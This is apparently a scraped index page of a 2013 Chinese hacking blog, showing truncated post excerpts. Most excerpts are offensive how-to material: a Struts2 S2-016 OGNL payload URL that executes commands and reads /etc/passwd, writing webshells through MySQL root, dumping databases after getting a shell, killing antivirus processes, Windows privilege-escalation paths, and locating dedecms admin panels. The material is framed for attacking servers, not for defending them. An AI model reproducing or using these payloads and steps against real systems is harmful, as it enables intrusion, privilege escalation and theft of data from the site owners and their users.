Rootnull - rootnull.com - LetItBe's Blog LetItBe's Blog
General Information:
Latest News:
CentOS下Python升级记录(2.4–2.7) 27 Aug 2013 | 03:58 pm
安装前确认zlib是否安装?没安装 请 yum install zlib zlib-devel wget http://www.python.org/ftp/python/2.7.3/Python-2.7.3.tgz tar zxvf Python-2.7.3.tgz cd Python-2.7.3 ./configure –prefix=/usr && make && make ins...
反向代理平台邀请码 29 Jul 2013 | 10:03 pm
邀请码十枚: 5AA3E1B4a41088eE9a37055A67f21459 E7e5b8B7e910512C5af203767B12D980 A0c055C4ACBfC3EEfc25049289315A69 4799e2e50c1E88724373BBc79A8806Ab efbf3B8C7d3dF48080d5cFB1CcF00D43 3048d3CC6927cad0FDfE63...
mysql 常用操作 23 Jul 2013 | 01:04 pm
mysql 开启外链: GRANT ALL PRIVILEGES ON *.* TO ‘root’@'%’ IDENTIFIED BY ‘root密码’ WITH GRANT OPTION mysql root 写shell: create table test (a text); insert into test (a) values ( ); select a from table ...
关于一些jsp网站getshell后脱裤的办法 21 Jul 2013 | 08:23 am
很多人用s2漏洞getshell后. 便出现各种问题: 找不到数据库配置文件 反弹shell root权限该怎么添加一个root用户 用菜刀连接shell 找不到数据库配置文件 s2框架也就是jsp网站在配置数据库连接的时候,一般会放在web-inc目录里面,具体放在什么位置,也看程序员怎么写.. 毕竟不像php一样.几乎都是开源的程序..比如常见的dedecms 放在data 的co...
Struts2 S2-016/S2-017 命令执行带回显、看web路径、getshell exp整理 19 Jul 2013 | 11:43 am
带回显命令执行: http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{‘cat’,'/etc/passwd’})).start(),%23b%3d%23a.getInputStream(),%23c%...
命令行下的读取iis domains 19 Jul 2013 | 11:34 am
需要读权限: C:\WINDOWS\system32\inetsrv\MetaBase.xml 另存为为 *.vbs 文件 dos下运行输出后即可输出
windows提权中敏感目录和敏感注册表的利用 12 Jul 2013 | 11:06 am
提权中的敏感目录 提权敏感目录 目录权限 提权用途 C:\Program Files\ 默认用户组users对该目录拥有查看权限 可以查看服务器安装的应用软件 C:\Documents and Settings\All Users\「开始」菜单\程序 Everyone拥有查看权限 存放快捷方式,可以下载文件,属性查看安装路径 C:\Documents and Settin...
windows 提权中常用命令 12 Jul 2013 | 10:54 am
查看3389端口: reg query HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber kill 命令 taskkill /im 360tray.exe /f #在windows 2003上有system权限可以用这命令kill 360 and safedog...
dedecms 常用方法 10 Jul 2013 | 08:39 pm
dedecms找后台: ———————————- 获取后台地址: 如果这样都查不到几乎没辙了: /data/mysql_error_trace.inc /data/mysqli_error_trace.inc 如果查不到,可以利用搜索引擎(尤其是搜狗搜索),搜索不到基本上没辙了(当然您可以利用暴力、弱口令爆破,这个不在本文讨论之中)。 site:domain.com 织梦内容管理系统...
关于本站 21 Jul 2012 | 09:39 pm
由于本人近期几个月有事需要处理,此博客暂时停止更新。 如有问题请致邮件:admin@rootnull.com